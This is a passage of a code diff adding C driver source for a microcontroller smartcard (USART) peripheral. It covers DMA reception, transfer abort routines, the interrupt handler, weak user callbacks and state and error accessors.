HAL_DMA_Start_IT(hsc->hdmarx, (uint32_t)&hsc->Instance->DR, *(uint32_t*)tmp, Size); + + /* Clear the Overrun flag just before enabling the DMA Rx request: can be mandatory for the second transfer */ + __HAL_SMARTCARD_CLEAR_OREFLAG(hsc); + + /* Process Unlocked */ + __HAL_UNLOCK(hsc); + + /* Enable the SMARTCARD Parity Error Interrupt */ + SET_BIT(hsc->Instance->CR1, USART_CR1_PEIE); + + /* Enable the SMARTCARD Error Interrupt: (Frame error, noise error, overrun error) */ + SET_BIT(hsc->Instance->CR3, USART_CR3_EIE); + + /* Enable the DMA transfer for the receiver request by setting the DMAR bit + in the SMARTCARD CR3 register */ + SET_BIT(hsc->Instance->CR3, USART_CR3_DMAR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Abort ongoing transfers (blocking mode). + * @param hsc SMARTCARD handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable PPP Interrupts + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort (in case of transfer in DMA mode) + * - Set handle State to READY + * @note This procedure is executed in blocking mode : when exiting function, Abort is considered as completed. + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_SMARTCARD_Abort(SMARTCARD_HandleTypeDef *hsc) +{ + /* Disable TXEIE, TCIE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hsc->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE | USART_CR1_TXEIE | USART_CR1_TCIE)); + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_EIE); + + /* Disable the SMARTCARD DMA Tx request if enabled */ + if(HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAT)) + { + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_DMAT); + + /* Abort the SMARTCARD DMA Tx channel : use blocking DMA Abort API (no callback) */ + if(hsc->hdmatx != NULL) + { + /* Set the SMARTCARD DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + hsc->hdmatx->XferAbortCallback = NULL; + + HAL_DMA_Abort(hsc->hdmatx); + } + } + + /* Disable the SMARTCARD DMA Rx request if enabled */ + if(HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_DMAR); + + /* Abort the SMARTCARD DMA Rx channel : use blocking DMA Abort API (no callback) */ + if(hsc->hdmarx != NULL) + { + /* Set the SMARTCARD DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + hsc->hdmarx->XferAbortCallback = NULL; + + HAL_DMA_Abort(hsc->hdmarx); + } + } + + /* Reset Tx and Rx transfer counters */ + hsc->TxXferCount = 0x00U; + hsc->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + + /* Restore hsc->RxState and hsc->gState to Ready */ + hsc->RxState = HAL_SMARTCARD_STATE_READY; + hsc->gState = HAL_SMARTCARD_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Abort ongoing Transmit transfer (blocking mode). + * @param hsc SMARTCARD handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable SMARTCARD Interrupts (Tx) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort (in case of transfer in DMA mode) + * - Set handle State to READY + * @note This procedure is executed in blocking mode : when exiting function, Abort is considered as completed. + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_SMARTCARD_AbortTransmit(SMARTCARD_HandleTypeDef *hsc) +{ + /* Disable TXEIE and TCIE interrupts */ + CLEAR_BIT(hsc->Instance->CR1, (USART_CR1_TXEIE | USART_CR1_TCIE)); + + /* Disable the SMARTCARD DMA Tx request if enabled */ + if(HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAT)) + { + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_DMAT); + + /* Abort the SMARTCARD DMA Tx channel : use blocking DMA Abort API (no callback) */ + if(hsc->hdmatx != NULL) + { + /* Set the SMARTCARD DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + hsc->hdmatx->XferAbortCallback = NULL; + + HAL_DMA_Abort(hsc->hdmatx); + } + } + + /* Reset Tx transfer counter */ + hsc->TxXferCount = 0x00U; + + /* Restore hsc->gState to Ready */ + hsc->gState = HAL_SMARTCARD_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Abort ongoing Receive transfer (blocking mode). + * @param hsc SMARTCARD handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable PPP Interrupts + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort (in case of transfer in DMA mode) + * - Set handle State to READY + * @note This procedure is executed in blocking mode : when exiting function, Abort is considered as completed. + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_SMARTCARD_AbortReceive(SMARTCARD_HandleTypeDef *hsc) +{ + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hsc->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_EIE); + + /* Disable the SMARTCARD DMA Rx request if enabled */ + if(HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_DMAR); + + /* Abort the SMARTCARD DMA Rx channel : use blocking DMA Abort API (no callback) */ + if(hsc->hdmarx != NULL) + { + /* Set the SMARTCARD DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + hsc->hdmarx->XferAbortCallback = NULL; + + HAL_DMA_Abort(hsc->hdmarx); + } + } + + /* Reset Rx transfer counter */ + hsc->RxXferCount = 0x00U; + + /* Restore hsc->RxState to Ready */ + hsc->RxState = HAL_SMARTCARD_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Abort ongoing transfers (Interrupt mode). + * @param hsc SMARTCARD handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable PPP Interrupts + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort_IT (in case of transfer in DMA mode) + * - Set handle State to READY + * - At abort completion, call user abort complete callback + * @note This procedure is executed in Interrupt mode, meaning that abort procedure could be + * considered as completed only when user abort complete callback is executed (not when exiting function). + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_SMARTCARD_Abort_IT(SMARTCARD_HandleTypeDef *hsc) +{ + uint32_t AbortCplt = 0x01U; + + /* Disable TXEIE, TCIE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hsc->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE | USART_CR1_TXEIE | USART_CR1_TCIE)); + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_EIE); + + /* If DMA Tx and/or DMA Rx Handles are associated to SMARTCARD Handle, DMA Abort complete callbacks should be initialised + before any call to DMA Abort functions */ + /* DMA Tx Handle is valid */ + if(hsc->hdmatx != NULL) + { + /* Set DMA Abort Complete callback if SMARTCARD DMA Tx request if enabled. + Otherwise, set it to NULL */ + if(HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAT)) + { + hsc->hdmatx->XferAbortCallback = SMARTCARD_DMATxAbortCallback; + } + else + { + hsc->hdmatx->XferAbortCallback = NULL; + } + } + /* DMA Rx Handle is valid */ + if(hsc->hdmarx != NULL) + { + /* Set DMA Abort Complete callback if SMARTCARD DMA Rx request if enabled. + Otherwise, set it to NULL */ + if(HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAR)) + { + hsc->hdmarx->XferAbortCallback = SMARTCARD_DMARxAbortCallback; + } + else + { + hsc->hdmarx->XferAbortCallback = NULL; + } + } + + /* Disable the SMARTCARD DMA Tx request if enabled */ + if(HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAT)) + { + /* Disable DMA Tx at SMARTCARD level */ + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_DMAT); + + /* Abort the SMARTCARD DMA Tx channel : use non blocking DMA Abort API (callback) */ + if(hsc->hdmatx != NULL) + { + /* SMARTCARD Tx DMA Abort callback has already been initialised : + will lead to call HAL_SMARTCARD_AbortCpltCallback() at end of DMA abort procedure */ + + /* Abort DMA TX */ + if(HAL_DMA_Abort_IT(hsc->hdmatx) != HAL_OK) + { + hsc->hdmatx->XferAbortCallback = NULL; + } + else + { + AbortCplt = 0x00U; + } + } + } + + /* Disable the SMARTCARD DMA Rx request if enabled */ + if(HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_DMAR); + + /* Abort the SMARTCARD DMA Rx channel : use non blocking DMA Abort API (callback) */ + if(hsc->hdmarx != NULL) + { + /* SMARTCARD Rx DMA Abort callback has already been initialised : + will lead to call HAL_SMARTCARD_AbortCpltCallback() at end of DMA abort procedure */ + + /* Abort DMA RX */ + if(HAL_DMA_Abort_IT(hsc->hdmarx) != HAL_OK) + { + hsc->hdmarx->XferAbortCallback = NULL; + AbortCplt = 0x01U; + } + else + { + AbortCplt = 0x00U; + } + } + } + + /* if no DMA abort complete callback execution is required => call user Abort Complete callback */ + if(AbortCplt == 0x01U) + { + /* Reset Tx and Rx transfer counters */ + hsc->TxXferCount = 0x00U; + hsc->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + + /* Restore hsc->gState and hsc->RxState to Ready */ + hsc->gState = HAL_SMARTCARD_STATE_READY; + hsc->RxState = HAL_SMARTCARD_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Abort complete callback */ + hsc->AbortCpltCallback(hsc); +#else + /* Call legacy weak Abort complete callback */ + HAL_SMARTCARD_AbortCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ + } + return HAL_OK; +} + +/** + * @brief Abort ongoing Transmit transfer (Interrupt mode). + * @param hsc SMARTCARD handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable SMARTCARD Interrupts (Tx) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort_IT (in case of transfer in DMA mode) + * - Set handle State to READY + * - At abort completion, call user abort complete callback + * @note This procedure is executed in Interrupt mode, meaning that abort procedure could be + * considered as completed only when user abort complete callback is executed (not when exiting function). + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_SMARTCARD_AbortTransmit_IT(SMARTCARD_HandleTypeDef *hsc) +{ + /* Disable TXEIE and TCIE interrupts */ + CLEAR_BIT(hsc->Instance->CR1, (USART_CR1_TXEIE | USART_CR1_TCIE)); + + /* Disable the SMARTCARD DMA Tx request if enabled */ + if(HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAT)) + { + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_DMAT); + + /* Abort the SMARTCARD DMA Tx channel : use blocking DMA Abort API (no callback) */ + if(hsc->hdmatx != NULL) + { + /* Set the SMARTCARD DMA Abort callback : + will lead to call HAL_SMARTCARD_AbortCpltCallback() at end of DMA abort procedure */ + hsc->hdmatx->XferAbortCallback = SMARTCARD_DMATxOnlyAbortCallback; + + /* Abort DMA TX */ + if(HAL_DMA_Abort_IT(hsc->hdmatx) != HAL_OK) + { + /* Call Directly hsc->hdmatx->XferAbortCallback function in case of error */ + hsc->hdmatx->XferAbortCallback(hsc->hdmatx); + } + } + else + { + /* Reset Tx transfer counter */ + hsc->TxXferCount = 0x00U; + + /* Restore hsc->gState to Ready */ + hsc->gState = HAL_SMARTCARD_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Abort Transmit Complete Callback */ + hsc->AbortTransmitCpltCallback(hsc); +#else + /* Call legacy weak Abort Transmit Complete Callback */ + HAL_SMARTCARD_AbortTransmitCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ + } + } + else + { + /* Reset Tx transfer counter */ + hsc->TxXferCount = 0x00U; + + /* Restore hsc->gState to Ready */ + hsc->gState = HAL_SMARTCARD_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Abort Transmit Complete Callback */ + hsc->AbortTransmitCpltCallback(hsc); +#else + /* Call legacy weak Abort Transmit Complete Callback */ + HAL_SMARTCARD_AbortTransmitCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ + } + + return HAL_OK; +} + +/** + * @brief Abort ongoing Receive transfer (Interrupt mode). + * @param hsc SMARTCARD handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable SMARTCARD Interrupts (Rx) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort_IT (in case of transfer in DMA mode) + * - Set handle State to READY + * - At abort completion, call user abort complete callback + * @note This procedure is executed in Interrupt mode, meaning that abort procedure could be + * considered as completed only when user abort complete callback is executed (not when exiting function). + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_SMARTCARD_AbortReceive_IT(SMARTCARD_HandleTypeDef *hsc) +{ + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hsc->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_EIE); + + /* Disable the SMARTCARD DMA Rx request if enabled */ + if(HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_DMAR); + + /* Abort the SMARTCARD DMA Rx channel : use blocking DMA Abort API (no callback) */ + if(hsc->hdmarx != NULL) + { + /* Set the SMARTCARD DMA Abort callback : + will lead to call HAL_SMARTCARD_AbortCpltCallback() at end of DMA abort procedure */ + hsc->hdmarx->XferAbortCallback = SMARTCARD_DMARxOnlyAbortCallback; + + /* Abort DMA RX */ + if(HAL_DMA_Abort_IT(hsc->hdmarx) != HAL_OK) + { + /* Call Directly hsc->hdmarx->XferAbortCallback function in case of error */ + hsc->hdmarx->XferAbortCallback(hsc->hdmarx); + } + } + else + { + /* Reset Rx transfer counter */ + hsc->RxXferCount = 0x00U; + + /* Restore hsc->RxState to Ready */ + hsc->RxState = HAL_SMARTCARD_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Abort Receive Complete Callback */ + hsc->AbortReceiveCpltCallback(hsc); +#else + /* Call legacy weak Abort Receive Complete Callback */ + HAL_SMARTCARD_AbortReceiveCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ + } + } + else + { + /* Reset Rx transfer counter */ + hsc->RxXferCount = 0x00U; + + /* Restore hsc->RxState to Ready */ + hsc->RxState = HAL_SMARTCARD_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Abort Receive Complete Callback */ + hsc->AbortReceiveCpltCallback(hsc); +#else + /* Call legacy weak Abort Receive Complete Callback */ + HAL_SMARTCARD_AbortReceiveCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ + } + + return HAL_OK; +} + +/** + * @brief This function handles SMARTCARD interrupt request. + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval None + */ +void HAL_SMARTCARD_IRQHandler(SMARTCARD_HandleTypeDef *hsc) +{ + uint32_t isrflags = READ_REG(hsc->Instance->SR); + uint32_t cr1its = READ_REG(hsc->Instance->CR1); + uint32_t cr3its = READ_REG(hsc->Instance->CR3); + uint32_t dmarequest = 0x00U; + uint32_t errorflags = 0x00U; + + /* If no error occurs */ + errorflags = (isrflags & (uint32_t)(USART_SR_PE | USART_SR_FE | USART_SR_ORE | USART_SR_NE)); + if(errorflags == RESET) + { + /* SMARTCARD in mode Receiver -------------------------------------------------*/ + if(((isrflags & USART_SR_RXNE) != RESET) && ((cr1its & USART_CR1_RXNEIE) != RESET)) + { + SMARTCARD_Receive_IT(hsc); + return; + } + } + + /* If some errors occur */ + if((errorflags != RESET) && (((cr3its & USART_CR3_EIE) != RESET) || ((cr1its & (USART_CR1_RXNEIE | USART_CR1_PEIE)) != RESET))) + { + /* SMARTCARD parity error interrupt occurred ---------------------------*/ + if(((isrflags & SMARTCARD_FLAG_PE) != RESET) && ((cr1its & USART_CR1_PEIE) != RESET)) + { + hsc->ErrorCode |= HAL_SMARTCARD_ERROR_PE; + } + + /* SMARTCARD frame error interrupt occurred ----------------------------*/ + if(((isrflags & SMARTCARD_FLAG_FE) != RESET) && ((cr3its & USART_CR3_EIE) != RESET)) + { + hsc->ErrorCode |= HAL_SMARTCARD_ERROR_FE; + } + + /* SMARTCARD noise error interrupt occurred ----------------------------*/ + if(((isrflags & SMARTCARD_FLAG_NE) != RESET) && ((cr3its & USART_CR3_EIE) != RESET)) + { + hsc->ErrorCode |= HAL_SMARTCARD_ERROR_NE; + } + + /* SMARTCARD Over-Run interrupt occurred -------------------------------*/ + if(((isrflags & SMARTCARD_FLAG_ORE) != RESET) && (((cr1its & USART_CR1_RXNEIE) != RESET) || ((cr3its & USART_CR3_EIE) != RESET))) + { + hsc->ErrorCode |= HAL_SMARTCARD_ERROR_ORE; + } + /* Call the Error call Back in case of Errors --------------------------*/ + if(hsc->ErrorCode != HAL_SMARTCARD_ERROR_NONE) + { + /* SMARTCARD in mode Receiver ----------------------------------------*/ + if(((isrflags & USART_SR_RXNE) != RESET) && ((cr1its & USART_CR1_RXNEIE) != RESET)) + { + SMARTCARD_Receive_IT(hsc); + } + + /* If Overrun error occurs, or if any error occurs in DMA mode reception, + consider error as blocking */ + dmarequest = HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAR); + if(((hsc->ErrorCode & HAL_SMARTCARD_ERROR_ORE) != RESET) || dmarequest) + { + /* Blocking error : transfer is aborted + Set the SMARTCARD state ready to be able to start again the process, + Disable Rx Interrupts, and disable Rx DMA request, if ongoing */ + SMARTCARD_EndRxTransfer(hsc); + /* Disable the SMARTCARD DMA Rx request if enabled */ + if(HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_DMAR); + + /* Abort the SMARTCARD DMA Rx channel */ + if(hsc->hdmarx != NULL) + { + /* Set the SMARTCARD DMA Abort callback : + will lead to call HAL_SMARTCARD_ErrorCallback() at end of DMA abort procedure */ + hsc->hdmarx->XferAbortCallback = SMARTCARD_DMAAbortOnError; + + if(HAL_DMA_Abort_IT(hsc->hdmarx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hsc->hdmarx->XferAbortCallback(hsc->hdmarx); + } + } + else + { +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered user error callback */ + hsc->ErrorCallback(hsc); +#else + /* Call legacy weak user error callback */ + HAL_SMARTCARD_ErrorCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ + } + } + else + { +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered user error callback */ + hsc->ErrorCallback(hsc); +#else + /* Call legacy weak user error callback */ + HAL_SMARTCARD_ErrorCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ + } + } + else + { + /* Non Blocking error : transfer could go on. + Error is notified to user through user error callback */ +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered user error callback */ + hsc->ErrorCallback(hsc); +#else + /* Call legacy weak user error callback */ + HAL_SMARTCARD_ErrorCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ + hsc->ErrorCode = HAL_SMARTCARD_ERROR_NONE; + } + } + return; + } /* End if some error occurs */ + + /* SMARTCARD in mode Transmitter ------------------------------------------*/ + if(((isrflags & SMARTCARD_FLAG_TXE) != RESET) && ((cr1its & USART_CR1_TXEIE) != RESET)) + { + SMARTCARD_Transmit_IT(hsc); + return; + } + + /* SMARTCARD in mode Transmitter (transmission end) -----------------------*/ + if(((isrflags & SMARTCARD_FLAG_TC) != RESET) && ((cr1its & USART_CR1_TCIE) != RESET)) + { + SMARTCARD_EndTransmit_IT(hsc); + return; + } +} + +/** + * @brief Tx Transfer completed callbacks + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval None + */ +__weak void HAL_SMARTCARD_TxCpltCallback(SMARTCARD_HandleTypeDef *hsc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMARTCARD_TxCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief Rx Transfer completed callback + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval None + */ +__weak void HAL_SMARTCARD_RxCpltCallback(SMARTCARD_HandleTypeDef *hsc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMARTCARD_RxCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief SMARTCARD error callback + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval None + */ +__weak void HAL_SMARTCARD_ErrorCallback(SMARTCARD_HandleTypeDef *hsc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMARTCARD_ErrorCallback can be implemented in the user file. + */ +} + +/** + * @brief SMARTCARD Abort Complete callback. + * @param hsc SMARTCARD handle. + * @retval None + */ +__weak void HAL_SMARTCARD_AbortCpltCallback (SMARTCARD_HandleTypeDef *hsc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMARTCARD_AbortCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief SMARTCARD Abort Transmit Complete callback. + * @param hsc SMARTCARD handle. + * @retval None + */ +__weak void HAL_SMARTCARD_AbortTransmitCpltCallback (SMARTCARD_HandleTypeDef *hsc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMARTCARD_AbortTransmitCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief SMARTCARD Abort Receive Complete callback. + * @param hsc SMARTCARD handle. + * @retval None + */ +__weak void HAL_SMARTCARD_AbortReceiveCpltCallback (SMARTCARD_HandleTypeDef *hsc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SMARTCARD_AbortReceiveCpltCallback can be implemented in the user file. + */ +} + +/** + * @} + */ + +/** @defgroup SMARTCARD_Exported_Functions_Group3 Peripheral State and Errors functions + * @brief SMARTCARD State and Errors functions + * +@verbatim + =============================================================================== + ##### Peripheral State and Errors functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to control the SmartCard. + (+) HAL_SMARTCARD_GetState() API can be helpful to check in run-time the state of the SmartCard peripheral. + (+) HAL_SMARTCARD_GetError() check in run-time errors that could be occurred during communication. +@endverbatim + * @{ + */ + +/** + * @brief Return the SMARTCARD handle state + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @retval HAL state + */ +HAL_SMARTCARD_StateTypeDef HAL_SMARTCARD_GetState(SMARTCARD_HandleTypeDef *hsc) +{ + uint32_t temp1= 0x00U, temp2 = 0x00U; + temp1 = hsc->gState; + temp2 = hsc->RxState; + + return (HAL_SMARTCARD_StateTypeDef)(temp1 | temp2); +} + +/** + * @brief Return the SMARTCARD error code + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for the specified SMARTCARD. + * @retval SMARTCARD Error Code + */ +uint32_t HAL_SMARTCARD_GetError(SMARTCARD_HandleTypeDef *hsc) +{ + return hsc->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @defgroup SMARTCARD_Private_Functions SMARTCARD Private Functions + * @{ + */ + +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) +/** + * @brief Initialize the callbacks to their default values. + * @param hsc SMARTCARD handle. + * @retval none + */ +void SMARTCARD_InitCallbacksToDefault(SMARTCARD_HandleTypeDef *hsc) +{ + /* Init the SMARTCARD Callback settings */ + hsc->TxCpltCallback = HAL_SMARTCARD_TxCpltCallback; /* Legacy weak TxCpltCallback */ + hsc->RxCpltCallback = HAL_SMARTCARD_RxCpltCallback; /* Legacy weak RxCpltCallback */ + hsc->ErrorCallback = HAL_SMARTCARD_ErrorCallback; /* Legacy weak ErrorCallback */ + hsc->AbortCpltCallback = HAL_SMARTCARD_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + hsc->AbortTransmitCpltCallback = HAL_SMARTCARD_AbortTransmitCpltCallback; /* Legacy weak AbortTransmitCpltCallback */ + hsc->AbortReceiveCpltCallback = HAL_SMARTCARD_AbortReceiveCpltCallback; /* Legacy weak AbortReceiveCpltCallback */ + +} +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACKS */ + +/** + * @brief DMA SMARTCARD transmit process complete callback + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SMARTCARD_DMATransmitCplt(DMA_HandleTypeDef *hdma) +{ + SMARTCARD_HandleTypeDef* hsc = ( SMARTCARD_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + hsc->TxXferCount = 0U; + + /* Disable the DMA transfer for transmit request by setting the DMAT bit + in the USART CR3 register */ + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_DMAT); + + /* Enable the SMARTCARD Transmit Complete Interrupt */ + SET_BIT(hsc->Instance->CR1, USART_CR1_TCIE); +} + +/** + * @brief DMA SMARTCARD receive process complete callback + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SMARTCARD_DMAReceiveCplt(DMA_HandleTypeDef *hdma) +{ + SMARTCARD_HandleTypeDef* hsc = ( SMARTCARD_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + hsc->RxXferCount = 0U; + + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hsc->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_EIE); + + /* Disable the DMA transfer for the receiver request by setting the DMAR bit + in the USART CR3 register */ + CLEAR_BIT(hsc->Instance->CR3, USART_CR3_DMAR); + + /* At end of Rx process, restore hsc->RxState to Ready */ + hsc->RxState = HAL_SMARTCARD_STATE_READY; + +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered Rx complete callback */ + hsc->RxCpltCallback(hsc); +#else + /* Call legacy weak Rx complete callback */ + HAL_SMARTCARD_RxCpltCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ +} + +/** + * @brief DMA SMARTCARD communication error callback + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SMARTCARD_DMAError(DMA_HandleTypeDef *hdma) +{ + uint32_t dmarequest = 0x00U; + SMARTCARD_HandleTypeDef* hsc = ( SMARTCARD_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + hsc->RxXferCount = 0U; + hsc->TxXferCount = 0U; + hsc->ErrorCode = HAL_SMARTCARD_ERROR_DMA; + + /* Stop SMARTCARD DMA Tx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAT); + if((hsc->gState == HAL_SMARTCARD_STATE_BUSY_TX) && dmarequest) + { + SMARTCARD_EndTxTransfer(hsc); + } + + /* Stop SMARTCARD DMA Rx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(hsc->Instance->CR3, USART_CR3_DMAR); + if((hsc->RxState == HAL_SMARTCARD_STATE_BUSY_RX) && dmarequest) + { + SMARTCARD_EndRxTransfer(hsc); + } + +#if (USE_HAL_SMARTCARD_REGISTER_CALLBACKS == 1) + /* Call registered user error callback */ + hsc->ErrorCallback(hsc); +#else + /* Call legacy weak user error callback */ + HAL_SMARTCARD_ErrorCallback(hsc); +#endif /* USE_HAL_SMARTCARD_REGISTER_CALLBACK */ +} + +/** + * @brief This function handles SMARTCARD Communication Timeout. + * @param hsc Pointer to a SMARTCARD_HandleTypeDef structure that contains + * the configuration information for SMARTCARD module. + * @param Flag Specifies the SMARTCARD flag to check. + * @param Status The new Flag status (SET or RESET). + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef 